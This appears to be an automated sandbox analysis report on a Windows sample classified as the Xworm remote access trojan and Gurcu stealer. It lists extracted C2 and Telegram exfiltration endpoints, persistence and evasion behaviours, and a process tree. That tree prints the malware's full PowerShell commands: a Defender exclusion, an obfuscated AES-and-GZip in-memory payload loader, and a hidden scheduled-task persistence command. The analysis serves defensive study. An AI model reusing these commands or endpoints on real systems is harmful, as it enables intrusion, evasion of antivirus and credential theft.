gurcu | fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7

Resubmissions

03-08-2024 03:03

240803-dj3vqs1dmq 10

03-08-2024 02:30

240803-czebmsvele 10

Analysis

max time kernel
144s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03-08-2024 02:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
Size

19.2MB
MD5

aa4bb4c57074e543076b145b7399cd64
SHA1

5e36e64cc686fa553b43d1c274d1a15e18b50501
SHA256

fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7
SHA512

ff38fc85d51fda9d32668949d2f67074be1e52cb6d63978155347173452199687935b9e96d3a060c7ab74461c5f4228b2c4cf8a0486ca5bbd9ea962a1c16c5eb
SSDEEP

393216:0W7LVQgX47mXZGbWVQjFLICQA122lrL8jiQIthY4eqfIgUJzM8/bX9Wwy:NBfXZGbBjFLICB1hUji1tWbZT9W/

Score

10^/10

gurcu xworm evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

floor-talked.gl.at.ply.gg:52348

Attributes

Install_directory
%AppData%
install_file
processor.exe
telegram
https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Extracted

Family

gurcu

https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4716-188-0x00000266EDD80000-0x00000266EDD96000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 12 IoCs

flow	pid	Process
8	5088	powershell.exe
10	4716	powershell.exe
12	4716	powershell.exe
14	5088	powershell.exe
18	4716	powershell.exe
19	5088	powershell.exe
20	5088	powershell.exe
21	4716	powershell.exe
24	5088	powershell.exe
25	4716	powershell.exe
26	5088	powershell.exe
27	4716	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 40 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2180	powershell.exe
3376	powershell.exe
2004	powershell.exe
3972	powershell.exe
3308	powershell.exe
740	powershell.exe
2624	powershell.exe
2212	powershell.exe
388	powershell.exe
2332	powershell.exe
3804	powershell.exe
2980	powershell.exe
4412	powershell.exe
4364	powershell.exe
4716	powershell.exe
4252	powershell.exe
1604	powershell.exe
5088	powershell.exe
4920	powershell.exe
4280	powershell.exe
2980	powershell.exe
3428	powershell.exe
4500	powershell.exe
1048	powershell.exe
4728	powershell.exe
3136	powershell.exe
2968	powershell.exe
508	powershell.exe
2056	powershell.exe
2548	powershell.exe
896	powershell.exe
3440	powershell.exe
2472	powershell.exe
212	powershell.exe
4192	powershell.exe
4000	powershell.exe
1936	powershell.exe
4068	powershell.exe
2204	powershell.exe
2216	powershell.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
4640	attrib.exe
3804	attrib.exe

Checks computer location settings 2 TTPs 15 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk	powershell.exe

Executes dropped EXE 6 IoCs

pid	Process
4256	S500RAT.exe
2320	S500RAT.exe
1056	S500RAT.exe
628	S500RAT.exe
2444	S500RAT.exe
1768	system.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\system\\system.exe\""	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4472	timeout.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	system.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	system.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	system.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4716	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3440	powershell.exe
3440	powershell.exe
4068	powershell.exe
4068	powershell.exe
4280	powershell.exe
4280	powershell.exe
4500	powershell.exe
4500	powershell.exe
2472	powershell.exe
2472	powershell.exe
3804	powershell.exe
3804	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
212	powershell.exe
212	powershell.exe
212	powershell.exe
2204	powershell.exe
2204	powershell.exe
2204	powershell.exe
4716	powershell.exe
4716	powershell.exe
3308	powershell.exe
3308	powershell.exe
4716	powershell.exe
3308	powershell.exe
2216	powershell.exe
2216	powershell.exe
2216	powershell.exe
740	powershell.exe
740	powershell.exe
1048	powershell.exe
1048	powershell.exe
1048	powershell.exe
740	powershell.exe
4192	powershell.exe
4192	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
4192	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
3136	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeIncreaseQuotaPrivilege	3804	powershell.exe
Token: SeSecurityPrivilege	3804	powershell.exe
Token: SeTakeOwnershipPrivilege	3804	powershell.exe
Token: SeLoadDriverPrivilege	3804	powershell.exe
Token: SeSystemProfilePrivilege	3804	powershell.exe
Token: SeSystemtimePrivilege	3804	powershell.exe
Token: SeProfSingleProcessPrivilege	3804	powershell.exe
Token: SeIncBasePriorityPrivilege	3804	powershell.exe
Token: SeCreatePagefilePrivilege	3804	powershell.exe
Token: SeBackupPrivilege	3804	powershell.exe
Token: SeRestorePrivilege	3804	powershell.exe
Token: SeShutdownPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeSystemEnvironmentPrivilege	3804	powershell.exe
Token: SeRemoteShutdownPrivilege	3804	powershell.exe
Token: SeUndockPrivilege	3804	powershell.exe
Token: SeManageVolumePrivilege	3804	powershell.exe
Token: 33	3804	powershell.exe
Token: 34	3804	powershell.exe
Token: 35	3804	powershell.exe
Token: 36	3804	powershell.exe
Token: SeIncreaseQuotaPrivilege	3804	powershell.exe
Token: SeSecurityPrivilege	3804	powershell.exe
Token: SeTakeOwnershipPrivilege	3804	powershell.exe
Token: SeLoadDriverPrivilege	3804	powershell.exe
Token: SeSystemProfilePrivilege	3804	powershell.exe
Token: SeSystemtimePrivilege	3804	powershell.exe
Token: SeProfSingleProcessPrivilege	3804	powershell.exe
Token: SeIncBasePriorityPrivilege	3804	powershell.exe
Token: SeCreatePagefilePrivilege	3804	powershell.exe
Token: SeBackupPrivilege	3804	powershell.exe
Token: SeRestorePrivilege	3804	powershell.exe
Token: SeShutdownPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeSystemEnvironmentPrivilege	3804	powershell.exe
Token: SeRemoteShutdownPrivilege	3804	powershell.exe
Token: SeUndockPrivilege	3804	powershell.exe
Token: SeManageVolumePrivilege	3804	powershell.exe
Token: 33	3804	powershell.exe
Token: 34	3804	powershell.exe
Token: 35	3804	powershell.exe
Token: 36	3804	powershell.exe
Token: SeIncreaseQuotaPrivilege	3804	powershell.exe
Token: SeSecurityPrivilege	3804	powershell.exe
Token: SeTakeOwnershipPrivilege	3804	powershell.exe
Token: SeLoadDriverPrivilege	3804	powershell.exe
Token: SeSystemProfilePrivilege	3804	powershell.exe
Token: SeSystemtimePrivilege	3804	powershell.exe
Token: SeProfSingleProcessPrivilege	3804	powershell.exe
Token: SeIncBasePriorityPrivilege	3804	powershell.exe
Token: SeCreatePagefilePrivilege	3804	powershell.exe
Token: SeBackupPrivilege	3804	powershell.exe
Token: SeRestorePrivilege	3804	powershell.exe
Token: SeShutdownPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeSystemEnvironmentPrivilege	3804	powershell.exe
Token: SeRemoteShutdownPrivilege	3804	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4716	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4512 wrote to memory of 4256	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	84
PID 4512 wrote to memory of 4256	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	84
PID 4512 wrote to memory of 3440	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	111
PID 4512 wrote to memory of 3440	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	111
PID 4512 wrote to memory of 1572	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	87
PID 4512 wrote to memory of 1572	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	87
PID 4512 wrote to memory of 4068	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	89
PID 4512 wrote to memory of 4068	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	89
PID 4512 wrote to memory of 3288	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	91
PID 4512 wrote to memory of 3288	4512	fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe	91
PID 1572 wrote to memory of 4280	1572	cmd.exe	93
PID 1572 wrote to memory of 4280	1572	cmd.exe	93
PID 3288 wrote to memory of 4500	3288	cmd.exe	94
PID 3288 wrote to memory of 4500	3288	cmd.exe	94
PID 4256 wrote to memory of 2320	4256	S500RAT.exe	96
PID 4256 wrote to memory of 2320	4256	S500RAT.exe	96
PID 4256 wrote to memory of 2472	4256	S500RAT.exe	97
PID 4256 wrote to memory of 2472	4256	S500RAT.exe	97
PID 4280 wrote to memory of 3804	4280	powershell.exe	141
PID 4280 wrote to memory of 3804	4280	powershell.exe	141
PID 4500 wrote to memory of 2180	4500	powershell.exe	101
PID 4500 wrote to memory of 2180	4500	powershell.exe	101
PID 4256 wrote to memory of 3300	4256	S500RAT.exe	103
PID 4256 wrote to memory of 3300	4256	S500RAT.exe	103
PID 4256 wrote to memory of 212	4256	S500RAT.exe	105
PID 4256 wrote to memory of 212	4256	S500RAT.exe	105
PID 4280 wrote to memory of 4768	4280	powershell.exe	154
PID 4280 wrote to memory of 4768	4280	powershell.exe	154
PID 4500 wrote to memory of 3336	4500	powershell.exe	108
PID 4500 wrote to memory of 3336	4500	powershell.exe	108
PID 4768 wrote to memory of 5096	4768	WScript.exe	109
PID 4768 wrote to memory of 5096	4768	WScript.exe	109
PID 3336 wrote to memory of 3440	3336	WScript.exe	111
PID 3336 wrote to memory of 3440	3336	WScript.exe	111
PID 4256 wrote to memory of 5076	4256	S500RAT.exe	113
PID 4256 wrote to memory of 5076	4256	S500RAT.exe	113
PID 2320 wrote to memory of 1056	2320	S500RAT.exe	115
PID 2320 wrote to memory of 1056	2320	S500RAT.exe	115
PID 2320 wrote to memory of 2204	2320	S500RAT.exe	134
PID 2320 wrote to memory of 2204	2320	S500RAT.exe	134
PID 5096 wrote to memory of 4716	5096	cmd.exe	118
PID 5096 wrote to memory of 4716	5096	cmd.exe	118
PID 3300 wrote to memory of 3308	3300	cmd.exe	119
PID 3300 wrote to memory of 3308	3300	cmd.exe	119
PID 2320 wrote to memory of 4836	2320	S500RAT.exe	190
PID 2320 wrote to memory of 4836	2320	S500RAT.exe	190
PID 2320 wrote to memory of 2216	2320	S500RAT.exe	122
PID 2320 wrote to memory of 2216	2320	S500RAT.exe	122
PID 3308 wrote to memory of 1048	3308	powershell.exe	124
PID 3308 wrote to memory of 1048	3308	powershell.exe	124
PID 2320 wrote to memory of 2188	2320	S500RAT.exe	125
PID 2320 wrote to memory of 2188	2320	S500RAT.exe	125
PID 3440 wrote to memory of 740	3440	cmd.exe	128
PID 3440 wrote to memory of 740	3440	cmd.exe	128
PID 1056 wrote to memory of 628	1056	S500RAT.exe	129
PID 1056 wrote to memory of 628	1056	S500RAT.exe	129
PID 1056 wrote to memory of 4192	1056	S500RAT.exe	130
PID 1056 wrote to memory of 4192	1056	S500RAT.exe	130
PID 3308 wrote to memory of 432	3308	powershell.exe	132
PID 3308 wrote to memory of 432	3308	powershell.exe	132
PID 432 wrote to memory of 4056	432	WScript.exe	133
PID 432 wrote to memory of 4056	432	WScript.exe	133
PID 1056 wrote to memory of 1208	1056	S500RAT.exe	135
PID 1056 wrote to memory of 1208	1056	S500RAT.exe	135

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4640	attrib.exe
3804	attrib.exe

C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
"C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
  "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4256
- - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
    "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
      "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1056
    - - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:628
      - C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        6⤵
        Executes dropped EXE
        
        PID:2444
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
        6⤵
        
        PID:4480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:2980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_459_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_459.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3428
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_459.vbs"
        8⤵
        Checks computer location settings
        
        PID:680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_459.bat" "
        9⤵
        
        PID:3480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
